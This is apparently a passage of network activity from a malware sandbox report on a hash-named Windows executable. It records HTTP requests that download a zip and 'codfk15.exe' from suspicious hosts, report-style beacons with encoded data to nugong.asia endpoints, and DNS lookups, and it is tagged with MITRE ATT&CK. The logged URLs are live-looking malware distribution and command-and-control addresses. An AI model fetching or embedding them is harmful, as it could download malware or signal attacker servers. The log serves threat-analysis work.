GET http://down.nugong.asia/pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zip
HTTP Response
200
HTTP Request
GET http://nreprot.nugong.asia/report/report_data?data=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
HTTP Response
200
HTTP Request
GET http://mprrpt.nugong.asia/report.php?data=[hex payload removed]
HTTP Response
200
-
288.1kB 15.2MB 5872 10873
HTTP Request
GET http://feoin.gognos.cn:59115/codfk15.exe
HTTP Response
200
-
8.8.8.8:53 54e03c235962947852b3fe22714547f2.vbnm34567.xyz dns aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 184 B 334 B 2 2
DNS Request
54e03c235962947852b3fe22714547f2.vbnm34567.xyz
DNS Request
54e03c235962947852b3fe22714547f2.vbnm34567.xyz
-
114.114.114.114:53 down.nugong.asia dns aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 62 B 392 B 1 1
DNS Request
down.nugong.asia
-
62 B 94 B 1 1
DNS Request
apps.game.qq.com
DNS Response
101.227.134.49
101.227.134.27
-
8.8.8.8:53 ocsp.trust-provider.cn dns aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 68 B 300 B 1 1
DNS Request
ocsp.trust-provider.cn
DNS Response
36.143.236.7
36.248.38.100
111.13.153.152
111.48.138.18
111.206.23.199
112.50.95.96
117.27.246.96
119.36.90.164
-
62 B 122 B 1 1
DNS Request
ocsp.digicert.cn
DNS Response
47.246.48.205
-
59 B 176 B 1 1
DNS Request
sp1.baidu.com
DNS Response
103.235.47.7
103.235.47.102
103.235.47.103
103.235.46.40
-
64 B 179 B 1 1
DNS Request
crl.globalsign.com
DNS Response
104.18.20.226
104.18.21.226
-
61 B 93 B 1 1
DNS Request
feoin.gognos.cn
DNS Response
43.249.192.68
222.173.195.26
-
MITRE ATT&CK Enterprise v15
Downloads